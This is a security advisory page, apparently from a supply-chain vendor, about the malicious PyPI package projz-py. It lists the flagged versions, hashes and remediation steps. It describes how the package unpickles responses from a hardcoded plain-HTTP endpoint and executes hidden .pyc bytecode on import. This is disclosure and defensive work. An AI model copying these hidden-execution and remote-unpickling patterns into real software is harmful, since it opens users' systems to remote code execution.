Which versions of projz-py are malicious?

The following PyPI versions of projz-py are flagged malicious: 1.7.1, 1.8.2, 2.3.5, 2.3.9. Treat any of these as compromised.

How do I remediate projz-py if I installed it?

Remove projz-py from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is projz-py part of a known attack campaign?

Yes — projz-py is associated with the IN-MAL-2026-002327, IN-MAL-2026-002328, IN-MAL-2026-002341, IN-MAL-2026-002326 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect projz-py in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking projz-py and packages like it before any post-install script runs.

Malicious package

projz-pyPyPI

Malicious code in projz-py (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-3696

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall projz-py

What this malware does

The package routes authentication-related calls through a hardcoded third-party HTTP endpoint and then unpickles the server's raw response, which is a textbook unauthenticated remote code execution primitive against the installer's Python process. Specifically, projz/api/control/rpc.py sets RPC_SERVER = 'http://deepthreads.ru' (plain HTTP) and implements _rpc as: pickle.dumps(args) → session.post(...) → pickle.loads(response.read()). This path is reached from projz/api/request_manager.py (build_headers calls provider.generate_request_signature) and from projz/client.py during registration (RPC.generate_smid), meaning normal documented use of the library drives pickle.loads on attacker-influenceable bytes. Anyone who controls that domain — or any network position on a plain-HTTP path — can execute arbitrary code in the process that imported projz. Compounding the risk, projz/api/secret/init.py opens a sibling secret.pyc, skips the 16-byte header, marshal.loads the code object and exec()s it at import time into a synthetic secret_functions module; headers_provider.py imports this at the top of the import graph, so the hidden bytecode runs on import projz. The.pyc is not present in the sdist, defeating source review of the code that actually builds request signatures and device IDs. The Termux-gated pkg install sox -y in setup.py is a minor additional concern (install-time mutation of system package state conditional on an environment marker) but is not the basis for this verdict.

Malicious versions

4 flagged

1.7.11.8.22.3.52.3.9

Indicators of compromise (SHA-256)

196ea7ee7277857a29c8478e6908961bde9f28aa136c3e6ae68412ba4b67bff0

c6b4243d00f36ad5ef1dfd6108ad281f84cf758795a7b58b339dab487de0e661

e3af2879058f056f670c860cfea1c319c21b56c32cc327a0fff72c2ad7fba7da

97f64abaec3c77f1cd6e406dc96a033001e271d486dfc97514e88350e9ed695f

Frequently asked questions

No. projz-py on PyPI has been identified as a malicious package (versions 1.7.1, 1.8.2, 2.3.5, 2.3.9 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-002327IN-MAL-2026-002328IN-MAL-2026-002341IN-MAL-2026-002326

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection